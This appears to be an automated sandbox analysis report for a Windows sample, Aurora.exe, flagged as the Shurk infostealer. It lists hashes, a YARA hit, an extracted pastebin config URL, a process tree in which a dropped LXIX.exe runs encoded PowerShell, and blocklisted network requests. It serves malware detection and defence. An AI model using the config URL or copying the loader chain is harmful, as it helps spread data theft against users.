Analysis
-
max time kernel
151s
-
max time network
30s
-
platform
windows7_x64
-
resource
win7-20230220-en
-
resource tags
arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
-
submitted
01-05-2023 10:45
Behavioral task
behavioral1
Sample
Aurora.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Aurora.exe
Resource
win10v2004-20230220-en
General
-
Target
Aurora.exe
-
Size
25.5MB
-
MD5
5b5049eee909a12420356f785890ee12
-
SHA1
2458920623ab942e1f564cb09ae25fb02b6b76a0
-
SHA256
4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
-
SHA512
5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
-
SSDEEP
98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF
Malware Config
Extracted
https://pastebin.com/raw/tPAFrSUD
Signatures
-
Shurk
Shurk is an infostealer, written in C++, which appeared in 2021.
-
Shurk Stealer payload 1 IoCs
Processes:
resource                                                                     yara_rule
behavioral1/memory/2008-60-0x0000000000400000-0x0000000001D8A000-memory.dmp  shurk_stealer
-
Blocklisted process makes network request 7 IoCs
Processes:
flow  pid   process
4     1200  powershell.exe
6     1200  powershell.exe
7     1200  powershell.exe
8     1200  powershell.exe
9     1200  powershell.exe
10    1200  powershell.exe
11    1200  powershell.exe
-
Executes dropped EXE 1 IoCs
Processes:
pid   process
2016  LXIX.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid   process
2008  Aurora.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pid   process
1200  powershell.exe
1200  powershell.exe
1636  powershell.exe
1940  taskmgr.exe
1940  taskmgr.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description               pid   process
Token: SeDebugPrivilege   1200  powershell.exe
Token: SeDebugPrivilege   1636  powershell.exe
Token: SeDebugPrivilege   1940  taskmgr.exe
-
Suspicious use of FindShellTrayWindow 14 IoCs
Processes:
pid   process
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
-
Suspicious use of SendNotifyMessage 14 IoCs
Processes:
pid   process
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
1940  taskmgr.exe
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
description                        pid   process         target process
PID 2008 wrote to memory of 2016   2008  Aurora.exe      LXIX.exe
PID 2008 wrote to memory of 2016   2008  Aurora.exe      LXIX.exe
PID 2008 wrote to memory of 2016   2008  Aurora.exe      LXIX.exe
PID 2008 wrote to memory of 2016   2008  Aurora.exe      LXIX.exe
PID 2016 wrote to memory of 1200   2016  LXIX.exe        powershell.exe
PID 2016 wrote to memory of 1200   2016  LXIX.exe        powershell.exe
PID 2016 wrote to memory of 1200   2016  LXIX.exe        powershell.exe
PID 2016 wrote to memory of 1200   2016  LXIX.exe        powershell.exe
PID 1200 wrote to memory of 1636   1200  powershell.exe  powershell.exe
PID 1200 wrote to memory of 1636   1200  powershell.exe  powershell.exe
PID 1200 wrote to memory of 1636   1200  powershell.exe  powershell.exe
PID 1200 wrote to memory of 1636   1200  powershell.exe  powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aurora.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
  C:\Users\Admin\AppData\Local\Temp\LXIX.exe
  "C:\Users\Admin\AppData\Local\Temp\LXIX.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
-
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB
MD5
decf4a367597bd686ed151ee5af53fdb
SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0UGIAZYGNZO0K1S7M2S.temp
Filesize
7KB
MD5
bb96e3a75aa1ed7ffc238a8a99f02f02
SHA1
995cb410201455bf8519498b33b0f661ae95a282
SHA256
d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
SHA512
fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB
MD5
bb96e3a75aa1ed7ffc238a8a99f02f02
SHA1
995cb410201455bf8519498b33b0f661ae95a282
SHA256
d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
SHA512
fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9
-
\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB
MD5
decf4a367597bd686ed151ee5af53fdb
SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e
-
memory/1200-63-0x00000000025C0000-0x0000000002600000-memory.dmp
Filesize
256KB
-
memory/1200-64-0x00000000025C0000-0x0000000002600000-memory.dmp
Filesize
256KB
-
memory/1636-70-0x0000000002720000-0x0000000002760000-memory.dmp
Filesize
256KB
-
memory/1636-71-0x0000000002720000-0x0000000002760000-memory.dmp
Filesize
256KB
-
memory/1940-72-0x0000000140000000-0x00000001405E8000-memory.dmp
Filesize
5.9MB
-
memory/1940-73-0x0000000140000000-0x00000001405E8000-memory.dmp
Filesize
5.9MB
-
memory/2008-60-0x0000000000400000-0x0000000001D8A000-memory.dmp
Filesize
25.5MB